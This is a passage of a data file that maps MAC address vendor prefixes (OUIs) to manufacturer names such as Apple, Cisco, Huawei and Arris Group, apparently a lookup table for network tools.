Broadband Technology AB +78AF58 Gimasi SA +00071C At&t +2C9AA4 Eolo SpA +002183 Andritz Hydro Gmbh +8404D2 Kirale Technologies SL +083E5D Sagemcom Broadband SAS +749CE3 KodaCloud Canada +CC2D21 Tenda Technology,Ltd.Dongguan branch +8C78D7 Shenzhen Fast Technologies +3CBD3E Beijing Xiaomi Electronics +2C4D54 Asustek Computer +349672 TP-Link Technologies +00179B Chant Sincere +348446 Ericsson AB +A4A1C2 Ericsson AB +B0F1EC Ampak Technology +B0C46C Senseit +148951 Lcfc(hefei) Electronics Technology +F87588 Huawei Technologies +BC3F8F Huawei Technologies +04DEF2 Shenzhen Ecom Technology +00D071 Echelon +0030C5 Cadence Design Systems +504061 Nokia +7467F7 Extreme Networks +B4C799 Extreme Networks +54E3F6 Alcatel-Lucent +5C0E8B Extreme Networks +00E02B Extreme Networks +B0C205 Bionime +0C61CF Texas Instruments +7C2664 Sagemcom Broadband SAS +E47DEB Shanghai Notion Information Technology +A002DC Amazon Technologies +0C47C9 Amazon Technologies +747548 Amazon Technologies +AC63BE Amazon Technologies +DCA4CA Apple +8C8FE9 Apple +40FA7F Preh Car Connect GmbH +F8AB05 Sagemcom Broadband SAS +C0028D Winstar Display +D83214 Tenda Technology,Ltd.Dongguan branch +7C787E Samsung Electronics +C0D3C0 Samsung Electronics +F097E5 Tamio +F4E4AD zte +F85971 Intel Corporate +9810E8 Apple +B49CDF Apple +4C82CF Echostar Technologies +F49634 Intel Corporate +144FD7 Ieee Registration Authority +6C4B90 LiteON +F8FF0B Electronic Technology +38F135 SensorTec-Canada +90F305 Humax +00093A Molex +98AAFC Ieee Registration Authority +B8D50B Sunitec Enterprise +28A6DB Huawei Technologies +C8F86D Alcatel-Lucent Shanghai Bell +D45F25 Shenzhen Youhua Technology +9CE951 Shenzhen Sang Fei Consumer Communications +DC0856 Alcatel-Lucent Enterprise +E8FDE8 CeLa Link +181212 Cepton Technologies +08ED02 Ieee Registration Authority +B4417A Shenzhen Gongjin Electronics +F4DE0C Espod +BC8AE8 Qing DAO Haier Telecom +440444 Guangdong Oppo Mobile Telecommunications +C09F05 Guangdong Oppo Mobile Telecommunications +CC2D83 Guangdong Oppo Mobile Telecommunications +38295A Guangdong Oppo Mobile Telecommunications +4C1A3D Guangdong Oppo Mobile Telecommunications +A81B5A Guangdong Oppo Mobile Telecommunications +DC6DCD Guangdong Oppo Mobile Telecommunications +70D379 Cisco Systems +7C4F7D Sawwave +185207 Sichuan Tianyi Comheart Telecomco. +9874DA Infinix mobility limited +143F27 Noccela Oy +64351C E-con Systems India PVT +5C6A80 ZyXEL Communications +0CB912 Jm-data Gmbh +1893D7 Texas Instruments +EC363F Markov +54FA3E Samsung Electronics +0C8910 Samsung Electronics +FCF136 Samsung Electronics +981DFA Samsung Electronics +84A466 Samsung Electronics +1867B0 Samsung Electronics +CCB11A Samsung Electronics +B8BBAF Samsung Electronics +60C5AD Samsung Electronics +28395E Samsung Electronics +C4AE12 Samsung Electronics +10D07A Ampak Technology +80B234 Technicolor CH USA +B877C3 Meter Group +003676 Arris Group +84E058 Arris Group +F07485 NGD Systems +347A60 Arris Group +BC644B Arris Group +F8A097 Arris Group +94E8C5 Arris Group +044E5A Arris Group +74EAE8 Arris Group +A811FC Arris Group +745612 Arris Group +E46449 Arris Group +C005C2 Arris Group +6455B1 Arris Group +203D66 Arris Group +D404CD Arris Group +446AB7 Arris Group +2C9924 Arris Group +001BDD Arris Group +001404 Arris Group +00195E Arris Group +001AAD Arris Group +A47AA4 Arris Group +1C1448 Arris Group +002493 Arris Group +40FC89 Arris Group +3C754A Arris Group +0024C1 Arris Group +002136 Arris Group +0022B4 Arris Group +002395 Arris Group +0023ED Arris Group +001B52 Arris Group +00230B Arris Group +001E8D Arris Group +0023A2 Arris Group +0015D1 Arris Group +001DD3 Arris Group +E8892C Arris Group +E83EFC Arris Group +707E43 Arris Group +0003E0 Arris Group +00128A Arris Group +001225 Arris Group +083E0C Arris Group +8C09F4 Arris Group +3CDFA9 Arris Group +105611 Arris Group +2C3AE8 Espressif +DC74A8 Samsung Electronics +C087EB Samsung Electronics +E8B6C2 Juniper Networks +B0DAF9 Arris Group +74F61C HTC +3438B7 Humax +5C1A6F Cambridge Industries(Group) +B089C2 Zyptonite +F0D4F6 Lars Thrane A/S +487D2E TP-Link Technologies +0403D6 Nintendo +A0AFBD Intel Corporate +34D954 WiBotic +6C60EB ZHI Yuan Electronics, Limited +AC4E2E Shenzhen JingHanDa ElectronicsLtd +B40016 Ingenico Terminals SAS +0027E3 Cisco Systems +A0341B TrackR +FCA667 Amazon Technologies +784501 Biamp Systems +488D36 Arcadyan +986F60 Guangdong Oppo Mobile Telecommunications +4C189A Guangdong Oppo Mobile Telecommunications +E45D52 Avaya +38BB3C Avaya +C057BC Avaya +D47856 Avaya +14612F Avaya +707C69 Avaya +A47886 Avaya +44322A Avaya +048A15 Avaya +6CA849 Avaya +A4251B Avaya +00040D Avaya +FC8399 Avaya +60313B Sunnovo International Limited +001CFA Alarm.com +B4E62A LG Innotek +E45AA2 vivo Mobile Communication +ECDF3A vivo Mobile Communication +F470AB vivo Mobile Communication +50184C Platina Systems +CC4639 WAAV +E4A749 Palo Alto Networks +786D94 Palo Alto Networks +30B164 Power Electronics International +18B430 Nest Labs +3CF591 Guangdong Oppo Mobile Telecommunications +602101 Guangdong Oppo Mobile Telecommunications +604762 Beijing Sensoro Technology +7CE2CA Juniper Networks +B0DFC1 Tenda Technology,Ltd.Dongguan branch +70788B vivo Mobile Communication +7065A3 Kandao lightforge +706E6D Cisco Systems +001DCC Ayon Cyber Security +FC2F6B Everspin Technologies +2CC5D3 Ruckus Wireless +F8E71E Ruckus Wireless +1CB9C4 Ruckus Wireless +C0C520 Ruckus Wireless +B4C170 Yi chip Microelectronics (Hangzhou) +540237 Teltronic AG +A89675 Motorola Mobility, a Lenovo Company +94F128 Hewlett Packard Enterprise +A47B9D Espressif +608E08 Samsung Electronics +7C2EDD Samsung Electronics +3CF7A4 Samsung Electronics +342D0D Samsung Electronics +94FBB2 Shenzhen Gongjin Electronics +EC3DFD Shenzhen Bilian Electronicltd +18742E Amazon Technologies +001885 Avigilon +8886C2 Stabilo International Gmbh +04FA3F Opticore +94D029 Guangdong Oppo Mobile Telecommunications +308454 Guangdong Oppo Mobile Telecommunications +FC7F56 CoSyst Control Systems GmbH +8C2505 Huawei Technologies +4C49E3 Xiaomi Communications +28D436 Jiangsu dewosi electric +149346 PNI sensor +18B81F Arris Group +00C064 General Datacomm +601283 TSB Real Time Location Systems S.L. +E06089 Cloudleaf +001219 General Datacomm +BC54FC Shenzhen Mercury Communication Technologies +547595 TP-Link Technologies +28F537 Ieee Registration Authority +18BC5A Zhejiang Tmall Technology +00869C Palo Alto Networks +00139D MaxLinear Hispania S.L.U. +4C16FC Juniper Networks +748EF8 Brocade Communications Systems +48C1AC Plantronics +0CE0E4 Plantronics +000389 Plantronics +E422A5 Plantronics +609C9F Brocade Communications Systems +000088 Brocade Communications Systems +000480 Brocade Communications Systems +00E052 Brocade Communications Systems +100D7F Netgear +6CB0CE Netgear +506A03 Netgear +B07FB9 Netgear +08028E Netgear +001F33 Netgear +C03F0E Netgear +0024B2 Netgear +204E7F Netgear +841B5E Netgear +A021B7 Netgear +A41566 Weifang GoerTek Technology +74E60F Tecno Mobile Limited +D8C497 Quanta Computer +444E6D AVM Audiovisuelles Marketing und Computersysteme GmbH +0050C7 Private +409922 AzureWave Technology +B8DB1C Integrated Device Technology (Malaysia) Sdn. Bhd. +3C10E6 Phazr +B80B9D Ropex Industrie-elektronik Gmbh +001526 Remote Technologies +34008A Ieee Registration Authority +00D060 Panasonic Europe +001987 Panasonic Mobile Communications +BCC342 Panasonic Communications +705812 Panasonic AVC Networks Company +CC7EE7 Panasonic AVC Networks Company +84253F silex technology +40D63C Equitech Industrial(DongGuan)Co. +40017A Cisco Systems +A4E975 Apple +C0A53E Apple +9800C6 Apple +787B8A Apple +3866F0 Apple +20EE28 Apple +08F4AB Apple +8C8590 Apple +FC017C Hon Hai Precision Ind. +2CB21A Phicomm (Shanghai) +28840E silicon valley immigration service +00C0EE Kyocera Display +CC5A53 Cisco Systems +BC2E48 Arris Group +940006 jinyoung +5C6776 IDS Imaging Development Systems GmbH +28EF01 Private +A875E2 Aventura Technologies +DC0C2D Weifang Goertek Electronics +904E91 Ieee Registration Authority +2C279E Ieee Registration Authority +38D620 Limidea Concept Pte. +00173A Cloudastructure +745C4B GN Audio A/S +64FB50 RoomReady/Zdi +5C2BF5 Vivint Wireless +00FC8B Amazon Technologies +10F163 TNK +940E6B Huawei Technologies +38378B Huawei Technologies +98F5A9 Ohsung +CC2237 Ieee Registration Authority +5033F0 Yichen (shenzhen) Technologyltd +C850E9 Raisecom Technology +90FD9F Silicon Laboratories +504EDC Ping Communication +50F722 Cisco Systems +344B3D Fiberhome Telecommunication Technologies +E42F26 Fiberhome Telecommunication Technologies +BC9889 Fiberhome Telecommunication Technologies +1088CE Fiberhome Telecommunication Technologies +FCF647 Fiberhome Telecommunication Technologies +74CC39 Fiberhome Telecommunication Technologies +6CA858 Fiberhome Telecommunication Technologies +341A35 Fiberhome Telecommunication Technologies +18D225 Fiberhome Telecommunication Technologies +185282 Fiberhome Telecommunication Technologies +BC4101 Shenzhen Tinno Mobile Technology +5C8D2D Shanghai Wellpay Information Technology +70B921 Fiberhome Telecommunication Technologies +BC825D Mitsumi Electric +5CA176 Sichuan Tianyi Comheart Telecomco. +C8E7F0 Juniper Networks +24F5A2 Belkin International +087808 Samsung Electronics +D03169 Samsung Electronics +BC5451 Samsung Electronics +741AE0 Ieee Registration Authority +BCC31B Kygo Life AS +FCD6BD Robert Bosch GmbH +782D7E Trendnet +28AD3E Shenzhen Tong BO WEI Technology +B06EBF Asustek Computer +48BA4E Hewlett Packard +FC65DE Amazon Technologies +F092B4 Sichuan Tianyi Comheart Telecomco. +707D95 Shenzhen City LinwlanTechnology +28D93E Telecor +8C0F83 Angie Hospitality +0050FC Edimax Technology +7483EF Arista Networks +001C73 Arista Networks +38AD8E New H3C Technologies +B0CA68 Apple +001248 Dell EMC +000144 Dell EMC +00BF61 Samsung Electronics +309FFB Ardomus Networks +5CE28C ZyXEL Communications +E4BD4B zte +6C5697 Amazon Technologies +74E19A Fiberhome Telecommunication Technologies +3CA581 vivo Mobile Communication +F4EAB5 Aerohive Networks +F82055 Green Information System +785C28 Prime Motion +944996 WiSilica +0026A8 Daehap Hyper-tech +F87B20 Cisco Systems +F81D0F Hitron Technologies. +30FB94 Shanghai Fangzhiwei Information Technology +08BA22 Swaive +F80CF3 LG Electronics (Mobile Communications) +30766F LG Electronics (Mobile Communications) +8C3AE3 LG Electronics (Mobile Communications) +942A3F Diversey +78F882 LG Electronics (Mobile Communications) +0C6111 Anda Technologies SAC +B8F74A Rcntec +C8D12A Comtrend +B4F1DA LG Electronics (Mobile Communications) +0021FB LG Electronics (Mobile Communications) +D013FD LG Electronics (Mobile Communications) +A8B86E LG Electronics (Mobile Communications) +DC4F22 Espressif +342AF1 Texas Instruments +70E56E Texas Instruments +F085C1 Shenzhen Rf-link Technology +C8DEC9 Coriant +D86CE9 Sagemcom Broadband SAS +3C81D8 Sagemcom Broadband SAS +2CE412 Sagemcom Broadband SAS +181E78 Sagemcom Broadband SAS +0037B7 Sagemcom Broadband SAS +0014BF Cisco-Linksys +6C8DC1 Apple +38CADA Apple +8C579B Wistron Neweb +B436A9 Fibocom Wireless +6416F0 Huawei Technologies +48DB50 Huawei Technologies +2400BA Huawei Technologies +68DBCA Apple +044BED Apple +3CBB73 Shenzhen Xinguodu Technology +3CCF5B Icomm HK Limited +F40304 Google +78ACC0 Hewlett Packard +3C9066 SmartRG +00195B D-Link +000D88 D-Link +001346 D-Link +205532 Gotech International Technology Limited +002401 D-Link +1CAFF7 D-Link International +B8A386 D-Link International +C8D3A3 D-Link International +4419B6 Hangzhou Hikvision Digital Technology +C056E3 Hangzhou Hikvision Digital Technology +C8E7D8 Shenzhen Mercury Communication Technologies +9CEFD5 Panda Wireless +C02C7A Shenzhen Horn Audio +88B8D0 Dongguan Koppo Electronic +38E7D8 HTC +D8B377 HTC +B4CEF6 HTC +D40B1A HTC +A08D16 Huawei Technologies +601888 zte +8002DF ORA +D8FC38 Giantec Semiconductor +2C6798 InTalTech +D0BF9C Hewlett Packard +B05ADA Hewlett Packard +001083 Hewlett Packard +0001E6 Hewlett Packard +C44044 RackTop Systems +3898D8 Meritech +000CF1 Intel +000E0C Intel +BC0F64 Intel Corporate +6CA100 Intel Corporate +94659C Intel Corporate +1002B5 Intel Corporate +441EA1 Hewlett Packard +D8D385 Hewlett Packard +18A905 Hewlett Packard +00237D Hewlett Packard +002655 Hewlett Packard +001560 Hewlett Packard +288023 Hewlett Packard +645106 Hewlett Packard +5CB901 Hewlett Packard +DC4A3E Hewlett Packard +2C59E5 Hewlett Packard +9CB654 Hewlett Packard +38EAA7 Hewlett Packard +E83935 Hewlett Packard +08EB74 Humax +6CB56B Humax +940937 Humax +403DEC Humax +E84DD0 Huawei Technologies +140467 SNK Technologies +EC5F23 Qinghai Kimascend Electronics Technology +047D50 Shenzhen Kang Ying TechnologyLtd. +54EFFE Fullpower Technologies +EC52DC World Media AND Technology +A4D18C Apple +CC25EF Apple +240995 Huawei Technologies +247F3C Huawei Technologies +1C8E5C Huawei Technologies +94772B Huawei Technologies +F4E3FB Huawei Technologies +04021F Huawei Technologies +0034FE Huawei Technologies +D02DB3 Huawei Technologies +086361 Huawei Technologies +F80113 Huawei Technologies +70723C Huawei Technologies +5C7D5E Huawei Technologies +4C8BEF Huawei Technologies +20F3A3 Huawei Technologies +ACE87B Huawei Technologies +688F84 Huawei Technologies +4CAC0A zte +0026ED zte +002293 zte +FCD733 TP-Link Technologies +10A5D0 Murata Manufacturing +D4C9B2 Quanergy Systems +E4CE02 WyreStorm Technologies +2002AF Murata Manufacturing +0026E8 Murata Manufacturing +ECCB30 Huawei Technologies +786A89 Huawei Technologies +2008ED Huawei Technologies +509F27 Huawei Technologies +CC96A0 Huawei Technologies +54A51B Huawei Technologies +F4C714 Huawei Technologies +286ED4 Huawei Technologies +04F938 Huawei Technologies +FC48EF Huawei Technologies +80FB06 Huawei Technologies +D4B110 Huawei Technologies +CC53B5 Huawei Technologies +002127 TP-Link Technologies +54E6FC TP-Link Technologies +D85D4C TP-Link Technologies +F81A67 TP-Link Technologies +F0F336 TP-Link Technologies +44B32D TP-Link Technologies +F07816 Cisco Systems +001310 Cisco-Linksys +0023BE Cisco Spvtg +54D46F Cisco Spvtg +24374C Cisco Spvtg +BCC810 Cisco Spvtg +484487 Cisco Spvtg +445829 Cisco Spvtg +481D70 Cisco Spvtg +00214F Alps Electric +00E036 Pioneer +E0AE5E Alps Electric +34C731 Alps Electric +60380E Alps Electric +64D4BD Alps Electric +00000C Cisco Systems +004096 Cisco Systems +30F70D Cisco Systems +B07D47 Cisco Systems +D8B190 Cisco Systems +F0B2E5 Cisco Systems +188B9D Cisco Systems +38ED18 Cisco Systems +ECBD1D Cisco Systems +DCCEC1 Cisco Systems +84B261 Cisco Systems +70E422 Cisco Systems +0050BD Cisco Systems +009086 Cisco Systems +005054 Cisco Systems +3C0E23 Cisco Systems +90E6BA Asustek Computer +BCAEC5 Asustek Computer +10BF48 Asustek Computer +A80C0D Cisco Systems +B83861 Cisco Systems +6C9989 Cisco Systems +580A20 Cisco Systems +0050D1 Cisco Systems +00500B Cisco Systems +005073 Cisco Systems +00603E Cisco Systems +00E034 Cisco Systems +001868 Cisco Spvtg +887556 Cisco Systems +60735C Cisco Systems +FC9947 Cisco Systems +7CC537 Apple +70CD60 Apple +24AB81 Apple +581FAA Apple +A46706 Apple +3C0754 Apple +E4CE8F Apple +E8040B Apple +B8C75D Apple +403CFC Apple +286AB8 Apple +7CC3A1 Apple +00E16D Cisco Systems +F8C288 Cisco Systems +E0ACF1 Cisco Systems +FC5B39 Cisco Systems +346F90 Cisco Systems +E0D173 Cisco Systems +74A02F Cisco Systems +547C69 Cisco Systems +689CE2 Cisco Systems +40A6E8 Cisco Systems +B8782E Apple +000502 Apple +0010FA Apple +000393 Apple +0016CB Apple +0017F2 Apple +001B63 Apple +001EC2 Apple +002608 Apple +7C6D62 Apple +40D32D Apple +D83062 Apple +C42C03 Apple +6C2056 Cisco Systems +BC1665 Cisco Systems +44ADD9 Cisco Systems +0C2724 Cisco Systems +6C416A Cisco Systems +F872EA Cisco Systems +0C6803 Cisco Systems +789F70 Apple +DC3714 Apple +40331A Apple +94F6A3 Apple +D81D72 Apple +70ECE4 Apple +38C986 Apple +FCFC48 Apple +2857BE Hangzhou Hikvision Digital Technology +50D59C Thai Habel Industrial +FCA386 Shenzhen Chuangwei-rgb Electronics +F0F249 Hitron Technologies. +A4C361 Apple +AC7F3E Apple +280B5C Apple +90B931 Apple +24A2E1 Apple +80EA96 Apple +600308 Apple +04F13E Apple +54724F Apple +48746E Apple +3CAB8E Apple +7C6DF8 Apple +48D705 Apple +3CD0F8 Apple +98D6BB Apple +4CB199 Apple +64E682 Apple +804971 Apple +98FE94 Apple +D8004D Apple +98B8E3 Apple +80929F Apple +885395 Apple +9C04EB Apple +78FD94 Apple +C88550 Apple +D4F46F Apple +787E61 Apple +60F81D Apple +4C7C5F Apple +48E9F1 Apple +FCE998 Apple +F099BF Apple +68644B Apple +A8968A Apple +4C8D79 Apple +207D74 Apple +F4F15A Apple +042665 Apple +2CB43A Apple +689C70 Apple +087045 Apple +CCE0C3 Mangstor +84A423 Sagemcom Broadband SAS +346987 zte +58685D Tempo Australia +789C85 August Home +FCCF43 Huizhou City Huiyang District Meisiqi Industry Development +5882A8 Microsoft +B4EF04 Daihan Scientific +049645 Wuxi SKY Chip Interconnection Technology +C8C2C6 Shanghai Airm2m Communication Technology +EC64E7 Mocacare +D07C2D Leie IOT technology +40862E JDM Mobile Internet Solution +EC388F Huawei Technologies +BC9C31 Huawei Technologies +90C99B Recore Systems +5CB559 Cnex Labs +5CCF7F Espressif +380546 Foctek Photonics +6858C5 ZF TRW Automotive +044169 GoPro +ACC51B Zhuhai Pantum Electronics +E80734 Champion Optical Network Engineering +6CEBB2 Dongguan Sen DongLv Electronics +A03299 Lenovo (Beijing) +A845CD Siselectron Technology +D0C193 Skybell +209BCD Apple +F0B0E7 Apple +CC20E8 Apple +E435C8 Huawei Technologies +D47208 Bragi GmbH +489A42 Technomate +B49D0B BQ +98CB27 Galore Networks Pvt. +30D32D devolo AG +CC794A BLU Products +60FD56 Woorisystems +483974 Proware Technologies +E855B4 SAI Technology +9CA69D Whaley TechnologyLtd +342606 CarePredict +B4AE2B Microsoft +80EB77 Wistron +B88981 Chengdu InnoThings Technology +B4293D Shenzhen Urovo Technology +906FA9 Nanjing Putian Telecommunications Technology +14B370 Gigaset Digital Technology (Shenzhen) +FC2FEF UTT Technologies +EC21E5 Toshiba +44FDA3 Everysight +84D4C8 Widex A/S +247260 Iottech +44975A Shenzhen Fast Technologies +584822 Sony Mobile Communications AB +F8BF09 Huawei Technologies +B4B265 Daeho I&T +081FEB BinCube +785F4C Argox Information +5870C6 Shanghai Xiaoyi Technology +803B2A ABB Xiamen Low Voltage Equipment +A0A65C Supercomputing Systems AG +5CB395 Huawei Technologies +C412F5 D-Link International +44F436 zte +349B5B Maquet GmbH +E861BE Melec +54B80A D-Link International +D8ADDD Sonavation +C09A71 Xiamen Meitu Mobile Technologyltd +340B40 Mios Elettronica SRL +944A0C Sercomm +D02516 Shenzhen Mercury Communication Technologies +D05C7A Sartura d.o.o. +9C37F4 Huawei Technologies +5CEB68 Cheerstar Technology +F46A92 Shenzhen Fast Technologies +14AEDB VTech Telecommunications +B8C3BF Henan Chengshi NetWork TechnologyLtd +C0EE40 Laird Technologies +F0182B LG Chem +CC5FBF Topwise 3G Communication +14DDA9 Asustek Computer +485D36 Verizon +EC60E0 Avi-on Labs +145A83 Logi-D +4CEEB0 SHC Netzwerktechnik GmbH +188EF9 G2C +F4E9D4 QLogic +1422DB eero +0C413E Microsoft +007E56 China Dragon Technology Limited +086266 Asustek Computer +346C0F Pramod Telecom Pvt. +3C912B Vexata +54369B 1Verge Internet Technology (Beijing) +E4FED9 Edmi Europe +2852E0 Layon international Electronic & Telecom +E48501 Geberit International AG +1C3947 Compal Information (kunshan) +2CAD13 Shenzhen Zhilu Technology +68B983 b-plus GmbH +BC74D7 HangZhou JuRu Technology +E88E60 NSD +545146 AMG Systems +84DDB7 Cilag GmbH International +78EB14 Shenzhen Fast Technologies +D05BA8 zte +8CE78C DK Networks +E4BAD9 360 Fly +7C3CB6 Shenzhen Homecare Technology +BCE767 Quanzhou TDX Electronics +6CA7FA Youngbo Engineering +D0929E Microsoft +F4032F Reduxio Systems +84CFBF Fairphone +AC9E17 Asustek Computer +ACC73F Vitsmo +18BDAD L-tech +10C07C Blu-ray Disc Association +B87879 Roche Diagnostics GmbH +4480EB Motorola Mobility, a Lenovo Company +D06F4A Topwell International Holdings Limited +BC54F9 Drogoo Technology +349E34 Evervictory ElectronicLtd +A0C2DE Costar Video Systems +3809A4 Firefly Integrations +00A509 WigWag +A86405 nimbus 9 +7076FF Kerlink +68F0BC Shenzhen LiWiFi Technology +BCD165 Cisco Spvtg +4CA928 Insensi +2884FA Sharp +3C1E04 D-Link International +E0FFF7 Softiron +DC60A1 Teledyne Dalsa Professional Imaging +78E980 RainUs +7C8274 Shenzhen Hikeen Technology +B40566 SP Best +70AD54 Malvern Instruments +DCE026 Patrol Tag +EC3C88 Mcnex +F07959 Asustek Computer +E08E3C Aztech Electronics Pte +78A351 Shenzhen Zhibotong Electronics +94E2FD Boge Kompressoren Otto Boge Gmbh & KG +E4695A Dictum Health +D46132 Pro Concept Manufacturer +54A050 Asustek Computer +841826 Osram GmbH +14F893 Wuhan FiberHome Digital Technology +9816EC IC Intracom +DCDA4F Getck Technology +30FAB7 Tunai Creative +0809B6 Masimo +14EDE4 Kaiam +3438AF Inlab Software GmbH +049B9C Eadingcore Intelligent Technology +842690 Beijing Thought Science +B84FD5 Microsoft +587BE9 AirPro Technology India Pvt. +FC1D84 Autobase +4CE933 RailComm +6050C1 Kinetek Sports +003560 Rosen Aviation +EC59E7 Microsoft +08EFAB Sayme Wireless Sensor Network +C81B6B Innova Security +5C966A Rtnet +2C5089 Shenzhen Kaixuan Visual Technology,Limited +EC13B2 Netonix +74BADB Longconn Electornics(shenzhen)Co. +4C7403 BQ +5876C5 Digi I'S +00A2F5 Guangzhou Yuanyun Network Technology +70FC8C OneAccess SA +902CC7 C-MAX Asia Limited +188219 Alibaba Cloud Computing +B41780 DTI Group +D437D7 zte +AC3870 Lenovo Mobile Communication Technology +80EACA Dialog Semiconductor Hellas SA +4CBC42 Shenzhen Hangsheng Electronics +987E46 Emizon Networks Limited +8432EA Anhui Wanzten P&T +90B686 Murata Manufacturing +4C6E6E Comnect Technology +F4DD9E GoPro +40B3CD Chiyoda Electronics +3451AA JID Global +04572F Sertel Electronics UK +08B2A3 Cynny Italia S.r.L. +D8977C Grey Innovation +80AD67 Kasda Networks +30595B streamnow AG +B8AD3E Bluecom +10C37B Asustek Computer +48D855 Telvent +284ED7 OutSmart Power Systems +5C5BC2 YIK +EC8A4C zte +8014A8 Guangzhou V-solution Electronic Technology +908C63 GZ Weedong Networks Technology +B49EAC Imagik Int'l +C8E42F Technical Research Design and Development +FC2325 EosTek (Shenzhen) +A81374 Panasonic AVC Networks Company +4C83DE Cisco Spvtg +5CB6CC NovaComm Technologies +B4AE6F Circle Reliance, DBA Cranberry Networks +B89919 7signal Solutions +90DA6A Focus H&S +A45DA1 ADB Broadband Italia +E8EF89 Opmex Tech. +F4C447 Coagent International Enterprise Limited +08DF1F Bose +542AA2 Alpha Networks +84948C Hitron Technologies. +CCA0E5 DZG Metering GmbH +3059B7 Microsoft +0874F6 Winterhalter Gastronom GmbH +FCC2DE Murata Manufacturing +1C1CFD Dalian Hi-Think Computer Technology +7062B8 D-Link International +B875C0 PayPal +E47FB2 Fujitsu Limited +38262B UTran Technology +20ED74 Ability enterprise +7824AF Asustek Computer +0CAC05 Unitend Technologies +B4B859 Texa Spa +045C8E Gosund Group +54B753 Hunan Fenghui Yinjia Science And Technology +4826E8 Tek-Air Systems +A012DB Tabuchi Electric +ACB859 Uniband Electronic +100F18 Fu Gang Electronic(KunShan)CO. +C8D590 Flight Data Systems +709383 Intelligent Optical Network High Tech +6047D4 Forics Electronic Technology +C09D26 Topicon HK Lmd. +B061C7 Ericsson-LG Enterprise +B05706 Vallox Oy +C8D429 Muehlbauer AG +20EAC7 Shenzhen Riopine Electronics +80618F Shenzhen sangfei consumer communications +5CF50D Institute of microelectronic applications +10DEE4 automationNEXT GmbH +444891 Hdmi Licensing +FC923B Nokia +38F708 National Resource Management +C4C919 Energy Imports +88A73C Ragentek Technology Group +B0D7C5 Logipix +38C9A9 Smart High Reliability Solutions +BC1A67 YF Technology +B024F3 Progeny Systems +8C4DB9 Unmonday +D87CDD Sanix Incorporated +F8A2B4 Rhewa-waagenfabrik August Freudewald Gmbh &co. KG +84FE9E RTC Industries +403067 Conlog (Pty) +98DA92 Vuzix +5C2AEF Open Access +E40439 TomTom Software +90AE1B TP-Link Technologies +441E91 Arvida Intelligent Electronics Technology +6C14F7 Erhardt+Leimer GmbH +CC07E4 Lenovo Mobile Communication Technology +B4430D Broadlink +A4BBAF Lime Instruments +7CE1FF Computer Performance, DBA Digital Loggers +D069D0 Verto Medical Solutions +ACE069 Isaac Instruments +E8EA6A StarTech.com +C4E984 TP-Link Technologies +8059FD Noviga +18FF2E Shenzhen Rui Ying Da Technology +1CAB01 Innovolt +68856A OuterLink +30F42F ESP +746A8F VS Vision Systems GmbH +B068B6 Hangzhou OYE Technology +9C65F9 AcSiP Technology +487604 Private +D057A1 Werma Signaltechnik GmbH & KG +3C89A6 Kapelse +90F1B0 Hangzhou Anheng Info&Tech +9C86DA Phoenix Geophysics +48FEEA Homa +10DDF4 Maxway Electronics +080371 KRG Corporate +ACC595 Graphite Systems +3413A8 Mediplan Limited +4CD9C4 Magneti Marelli Automotive Electronics (Guangzhou) +743ECB Gentrice tech +7071B3 Brain +208986 zte +3CD4D6 WirelessWERX +64E625 Woxu Wireless +7C444C Entertainment Solutions +501AC5 Microsoft +609620 Private +F8572E Core Brands +E0E631 SNB Technologies Limited +20C60D Shanghai annijie Information technology +7C9763 Openmatics s.r.o. +0444A1 Telecon Galicia +84569C Coho Data +78AE0C Far South Networks +38CA97 Contour Design +84A783 Alcatel Lucent +1CC11A Wavetronix +4CF02E Vifa Denmark A/S +3051F8 BYK-Gardner GmbH +94C3E4 SCA Schucker Gmbh & KG +FC19D0 Cloud Vision Networks Technology +20E791 Siemens Healthcare Diagnostics +68764F Sony Mobile Communications AB +D4D919 GoPro +A49F89 Shanghai Rui Rui Communication TechnologyLtd. +D850E6 Asustek Computer +94103E Belkin International +B4750E Belkin International +346178 The Boeing Company +187ED5 shenzhen kaism technology +841B38 Shenzhen Excelsecu Data Technology +EC2AF0 Ypsomed AG +044F8B Adapteva +9CE7BD Winduskorea +A0BF50 S.C. Add-production S.r.l. +7CB733 Askey Computer +705957 Medallion Instrumentation Systems +6C8366 Nanjing SAC Power Grid Automation +88576D XTA Electronics +F83D4E Softlink Automation System +FCD817 Beijing Hesun TechnologiesLtd. +909F43 Accutron Instruments +50C006 Carmanah Signs +98FB12 Grand Electronics (HK) +3C1040 daesung network +B04545 Yacoub Automation Gmbh +701D7F Comtech Technology +60DB2A HNS +7CBF88 Mobilicom +90028A Shenzhen Shidean Legrand Electronic Products +90356E Vodafone Omnitel N.V. +3CCA87 Iders Incorporated +08CA45 Toyou Feiji Electronics +9CA9E4 zte +E47723 zte +C098E5 University of Michigan +B8DF6B SpotCam +742B62 Fujitsu Limited +58BDF9 Sigrand +344F3F IO-Power Technology +C0C687 Cisco Spvtg +142BD2 Armtel +54A54B NSC Communications Siberia +BC2B6B Beijing Haier IC Design +642184 Nippon Denki Kagaku +EC3E09 Performance Designed Products +EC219F VidaBox +98D331 Shenzhen Bolutek Technology +3C1A57 Cardiopulmonary +6CF97C Nanoptix +58E02C Micro Technic A/S +E481B3 Shenzhen ACT Industrial +E4F3E3 Shanghai iComhome +04CF25 Manycolors +D41090 iNFORM Systems AG +3495DB Logitec +88142B Protonic Holland +B8241A Sweda Informatica Ltda +3806B4 A.D.C. GmbH +341B22 Grandbeing Technology +B4346C Matsunichi Digital Technology (hong Kong) Limited +9C1465 Edata Elektronik San. ve Tic. A.. +587A4D Stonesoft +E89218 Arcontia International AB +58F387 Hccp +B0793C Revolv +20CEC4 Peraso Technologies +700FEC Poindus Systems +78D5B5 Navielektro KY +E067B3 C-Data Technology +B887A8 Step Ahead Innovations +140D4F Flextronics International +B847C6 SanJet Technology +4CDF3D Team Engineers Advance Technologies India PVT +70F176 Data Modul AG +205721 Salix Technology +704CED TMRG +E8516E Tsmart +7C1AFC Dalian-Edifice Video Technology +C034B4 Gigastone +74ADB7 China Mobile Group Device +DC6F00 Livescribe +D0737F Mini-Circuits +A4D094 Erwin Peters Systemtechnik GmbH +0488E2 Beats Electronics +D00EA4 Porsche Cars North America +F415FD Shanghai Pateo Electronic Equipment Manufacturing +2C9464 Cincoze +B050BC Shenzhen Basicom Electronic +DC7014 Private +40BC73 Cronoplast S.L. +78303B Stephen Technologies,Limited +78F5E5 Bega Gantenbrink-leuchten KG +804B20 Ventilation Control +4007C0 Railtec Systems GmbH +94B8C5 RuggedCom +8C3C07 Skiva Technologies +784B08 f.robotics acquisitions +0C2D89 QiiQ Communications +604A1C Suyin +A4D3B5 Glitel Stropkov, S.r.o. +A4F3C1 Open Source Robotics Foundation 